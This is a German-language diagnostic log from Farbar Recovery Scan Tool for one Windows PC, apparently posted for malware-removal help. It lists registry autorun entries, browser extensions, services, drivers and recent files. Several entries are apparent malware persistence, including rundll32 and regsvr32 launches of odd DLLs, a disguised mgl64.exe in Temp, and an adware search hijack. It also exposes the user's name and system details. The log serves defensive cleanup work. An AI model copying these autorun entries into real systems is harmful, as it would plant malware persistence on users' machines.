HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [ctfmon] => C:\WINDOWS\system32\ctfmon.exe [10752 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4557504 2016-10-06] (Disc Soft Ltd)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [{71257112-2DEC-B5C4-6C86-88509071DF29}] => C:\Windows\Temp\mgl64.exe [335360 2016-12-03] (      Ghisler          Software  GmbH) <===== ACHTUNG
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Idhsoft] => C:\Users\Patrick\AppData\Local\Idhsoft\mgl64.exe [335360 2016-12-02] (      Ghisler          Software  GmbH)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Akworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Patrick\AppData\Local\Idhsoft\sbdzoqlr.dll
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {19b79380-b27e-11e6-9858-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {ca47ee10-8280-11e6-9848-201a06114318} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {d8aa2e3c-7f52-11e6-983e-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-18\...\Run: [huuigl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll",huuigl <===== ACHTUNG
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-22] ()
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-22] ()
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-22] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-22] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-22] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-22] ()
Startup: C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2016-03-20]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Patrick\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{ce2c89b3-0cea-4292-b4ba-fd6c0e758f97}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope Wert fehlt
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: 5fqwv91p.default
FF ProfilePath: C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default [2016-12-03]
FF Keyword.URL: Mozilla\Firefox\Profiles\5fqwv91p.default -> user_pref("keyword.URL", true);
FF Extension: (Avira Browser Safety) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\abs@avira.com.xpi [2016-11-21]
FF Extension: (Add to Search Bar) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\add-to-searchbox@maltekraus.de.xpi [2016-01-20]
FF Extension: (Alldebrid extension) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\alldebrid@alldebrid.com.xpi [2016-11-07]
FF Extension: (Classic Theme Restorer) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\ClassicThemeRestorer@ArisT2Noia4dev.xpi [2016-11-21]
FF Extension: (Classic Reload-Stop-Go Button) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\crsg@ArisT2_Noia4dev.xpi [2016-06-18]
FF Extension: (StatusbarEx) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\doudehou@gmail.com [2016-04-27]
FF Extension: (ExHentai Easy 2) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\jid1-7NbXi2AqS1oUFw@jetpack.xpi [2016-08-12]
FF Extension: (Video WithOut Flash) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\vwof@drev.com.xpi [2016-01-13]
FF Extension: (Download Status Bar) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\{6c28e999-e900-4635-a39d-b1ec90ba0c0f}.xpi [2016-09-27]
FF Extension: (NoScript) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-11-29]
FF Extension: (Web Developer) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\{c45c406e-ab73-11d8-be73-000a95be3b12}.xpi [2016-08-18]
FF Extension: (Greasemonkey) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2016-08-19]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-12] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @qq.com/npchrome -> C:\Program Files (x86)\Common Files\Tencent\Npchrome\npchrome.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3097098544-2319845998-2187571786-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Patrick\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-17] (Unity Technologies ApS)

Chrome:
=======
CHR DefaultSearchURL: Default -> hxxp://feed.mountainbrowse.com/?fext=true&publisherid=51623&publisher=mountext&st=et&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Mount
CHR Profile: C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default [2016-12-03]
CHR Extension: (Google Präsentationen) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-22]
CHR Extension: (Google Docs) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-22]
CHR Extension: (Google Drive) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-22]
CHR Extension: (YouTube) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-22]
CHR Extension: (Google-Suche) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-22]
CHR Extension: (Google Tabellen) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-22]
CHR Extension: (Google Docs Offline) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16]
CHR Extension: (Core) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkhcgfdghbiidgeccbldhfceleibkkpe [2016-03-13]
CHR Extension: (SearchPreview) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcjdanpjacpeeppdjkppebobilhaglfo [2016-10-29]
CHR Extension: (vGet Extension (Video Downloader, DLNA)) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\hniladkejehjfchadikcbjmgjaogciic [2016-07-12]
CHR Extension: (Mountain Browse) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhgknfkfipiflalfpihaicjijikenfoj [2016-12-03]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Unblock Youku) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pdnfnkhpgegpcingjbfihlkjeighnddk [2016-11-18]
CHR Extension: (Google Mail) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-22]
CHR Extension: (Chrome Media Router) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-29]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [312448 2013-09-07] (Windows (R) Win 7 DDK provider) [Datei ist nicht signiert]
S2 bespakduct; C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe [4608 2016-12-02] () [Datei ist nicht signiert]
R2 BitTorrent; C:\Program Files\BitTorrent\BitTorrent.exe [312320 2016-11-06] () [Datei ist nicht signiert] <==== ACHTUNG
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1468608 2016-10-06] (Disc Soft Ltd)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [144072 2015-10-07] (ELAN Microelectronics Corp.)
R2 hasplms; C:\WINDOWS\system32\hasplms.exe [4609928 2013-08-01] (SafeNet Inc.)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [192200 2016-08-26] () [Datei ist nicht signiert]
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [337888 2016-05-03] (Intel Corporation)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [458296 2016-10-25] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [458296 2016-10-25] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-11-17] (NVIDIA Corporation)
R2 NVIDIA Wireless Controller Service; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe [1165368 2016-10-25] (NVIDIA Corporation)
R2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [96880 2015-12-22] (Dritek System INC.)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [4088608 2016-09-21] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 YandexBrowserService; C:\Program Files (x86)\Yandex\YandexBrowser\16.10.1.1114\service_update.exe [885752 2016-11-09] (YANDEX LLC)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 ampa; C:\Windows\system32\ampa.sys [19568 2015-11-10] () [Datei ist nicht signiert]
S3 ampa; C:\Windows\SysWOW64\ampa.sys [19568 2015-11-10] () [Datei ist nicht signiert]
S3 BTATH_LWFLT; C:\WINDOWS\system32\DRIVERS\btath_lwflt.sys [77464 2013-09-07] (Qualcomm Atheros)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2015-12-22] (Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-10-07] (Disc Soft Ltd)
R2 hardlock; C:\WINDOWS\system32\drivers\hardlock.sys [331328 2013-08-01] (SafeNet Inc.)
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2016-05-25] (Huawei Technologies Co., Ltd.)
R2 kbdssvc; C:\WINDOWS\System32\drivers\kbdssvc.sys [112408 2014-10-31] (CFCA)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvaci.inf_amd64_9debaf626fb26761\nvlddmkm.sys [14174256 2016-11-18] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [29240 2016-10-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [47672 2016-10-25] (NVIDIA Corporation)
R3 Ps2Kb2Hid; C:\WINDOWS\System32\drivers\aPs2Kb2Hid.sys [26736 2015-12-22] (Dritek System Inc.)
S3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [34544 2013-08-28] (Synaptics Incorporated)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-12-03 19:41 - 2016-12-03 19:41 - 00000000 ____D C:\Users\Patrick\Desktop\FRST-OlderVersion
2016-12-02 23:30 - 2016-12-02 23:30 - 03910208 _____ C:\Users\Patrick\Desktop\AdwCleaner_6.030.exe
2016-12-02 23:17 - 2016-12-02 23:44 - 00000549 _____ C:\Users\Patrick\Desktop\JRT.txt
2016-12-02 23:15 - 2016-12-02 23:15 - 01631928 _____ (Malwarebytes) C:\Users\Patrick\Desktop\JRT.exe
2016-12-02 23:07 - 2016-12-02 23:07 - 00000000 ____D C:\Program Files\BitTorrent
2016-12-02 23:06 - 2016-12-03 02:33 - 00000000 ____D C:\AdwCleaner
2016-12-02 23:06 - 2016-12-02 23:06 - 00000004 _____ C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
2016-12-02 23:06 - 2016-12-02 23:06 - 00000000 ____D C:\Users\Patrick\AppData\Local\Idhsoft
2016-12-02 21:06 - 2016-12-02 21:07 - 00273260 _____ C:\TDSSKiller.3.1.0.12_02.12.2016_21.06.44_log.txt
2016-12-02 20:53 - 2016-12-02 20:56 - 00800322 _____ C:\TDSSKiller.3.1.0.12_02.12.2016_20.53.28_log.txt
2016-12-02 20:48 - 2016-12-02 20:51 - 00273260 _____ C:\TDSSKiller.3.1.0.12_02.12.2016_20.48.35_log.txt
2016-12-02 20:48 - 2016-12-02 20:48 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Patrick\Desktop\tdsskiller.exe
2016-12-02 20:39 - 2016-12-02 20:47 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-12-02 20:39 - 2016-12-02 20:39 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-12-02 20:39 - 2016-12-02 20:39 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-12-02 20:38 - 2016-12-03 19:38 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-12-02 20:38 - 2016-12-02 20:47 - 00000000 ____D C:\Users\Patrick\Desktop\mbar
2016-12-02 20:38 - 2016-12-02 20:38 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Patrick\Desktop\mbar-1.09.3.1001.exe
2016-12-02 07:17 - 2016-12-02 07:17 - 00000230 _____ C:\Users\Patrick\Desktop\Sid Meier's Civilization V (DirectX 11).url
2016-12-01 20:35 - 2016-12-01 20:35 - 00000000 ____D C:\Users\Patrick\AppData\Local\My Games
2016-11-30 18:45 - 2016-12-03 19:41 - 00021808 _____ C:\Users\Patrick\Desktop\FRST.txt
2016-11-30 18:45 - 2016-11-30 18:49 - 00067773 _____ C:\Users\Patrick\Desktop\Addition.txt
2016-11-30 18:44 - 2016-12-03 19:41 - 00000000 ____D C:\FRST
2016-11-30 18:33 - 2016-12-03 19:41 - 02411520 _____ (Farbar) C:\Users\Patrick\Desktop\FRST64.exe
2016-11-29 06:10 - 2016-11-29 06:10 - 00000222 _____ C:\Users\Patrick\Desktop\Death Road to Canada.url
2016-11-28 20:20 - 2016-10-19 21:13 - 00453382 ____R C:\WINDOWS\system32\Drivers\etc\hosts.20161128-202029.backup
2016-11-27 15:18 - 2016-11-27 15:18 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\.madgarden
2016-11-26 17:07 - 2016-11-26 17:07 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\NVIDIA
2016-11-26 17:07 - 2016-11-26 17:07 - 00000000 ____D C:\Users\Patrick\AppData\Local\Uber Entertainment
2016-11-26 17:06 - 2016-11-26 17:06 - 00003484 _____ C:\WINDOWS\System32\Tasks\IntelMemoryDiagnostic
2016-11-26 01:53 - 2016-11-26 01:53 - 00000000 ____D C:\Users\Patrick\.prefs
2016-11-26 01:52 - 2016-11-26 01:52 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\Sun
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\Sun
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\ProgramData\Oracle
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-11-26 01:52 - 2016-11-26 01:52 - 00000000 ____D C:\Program Files (x86)\Java
2016-11-24 20:49 - 2016-11-24 20:49 - 00000000 ____D C:\Users\Patrick\Neuer Ordner
2016-11-24 18:24 - 2016-11-24 18:24 - 00002162 _____ C:\Users\Public\Desktop\SDFormatter.lnk
2016-11-24 18:24 - 2016-11-24 18:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SDFormatter
2016-11-24 18:24 - 2016-11-24 18:24 - 00000000 ____D C:\Program Files (x86)\SDA
2016-11-24 18:23 - 2016-11-24 18:23 - 00000000 ____D C:\Users\Patrick\AppData\Local\Downloaded Installations
2016-11-23 23:18 - 2016-11-23 23:38 - 00000000 ____D C:\Users\Patrick\AppData\Local\PWU_ep2
2016-11-23 21:47 - 2016-11-23 21:47 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\rockbox.org
2016-11-23 20:38 - 2016-11-23 20:38 - 00463404 _____ C:\WINDOWS\Minidump\112316-5875-01.dmp
2016-11-23 20:17 - 2016-11-23 20:38 - 714201435 _____ C:\WINDOWS\MEMORY.DMP
2016-11-23 20:17 - 2016-11-23 20:38 - 00000000 ____D C:\WINDOWS\Minidump
2016-11-23 20:17 - 2016-11-23 20:17 - 00588292 _____ C:\WINDOWS\Minidump\112316-6265-01.dmp
2016-11-21 22:57 - 2016-11-21 22:57 - 00003324 _____ C:\WINDOWS\System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7}
2016-11-21 22:51 - 2016-11-21 22:59 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\α-MODEL
2016-11-21 22:51 - 2016-11-19 08:15 - 00617472 ____N (nobukichi) C:\WINDOWS\eiunin21.exe
2016-11-20 03:11 - 2016-11-20 03:11 - 00000000 ____D C:\Users\Patrick\Documents\Сохранения игр Quest Navigator
2016-11-19 03:15 - 2016-11-19 03:15 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2016-11-19 03:15 - 2016-11-17 02:03 - 06384576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 02477624 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00546752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00392128 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00083512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00069568 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2016-11-19 03:15 - 2016-11-16 10:52 - 07529957 _____ C:\WINDOWS\system32\nvcoproc.bin
2016-11-19 03:15 - 2016-09-09 19:25 - 00269600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2016-11-19 03:15 - 2016-09-09 19:25 - 00261920 _____ C:\WINDOWS\system32\vulkan-1.dll
2016-11-19 03:15 - 2016-09-09 19:25 - 00110880 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2016-11-19 03:15 - 2016-09-09 19:24 - 00125216 _____ C:\WINDOWS\system32\vulkaninfo.exe
2016-11-19 03:14 - 2016-11-17 01:58 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2016-11-19 03:13 - 2016-11-18 00:09 - 00048688 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvpciflt.sys
2016-11-19 03:13 - 2016-11-17 03:06 - 40123840 _____ C:\WINDOWS\system32\nvcompiler.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 35224632 _____ C:\WINDOWS\SysWOW64\nvcompiler.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 34711096 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 28203576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 10912232 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 10803880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 10354800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 09158432 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 08913328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 08761376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 03934504 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 03474064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 02953152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 02586048 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 01953336 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6437595.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 01585088 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6437595.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 01038904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00975296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00943552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00897080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00802768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00683640 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
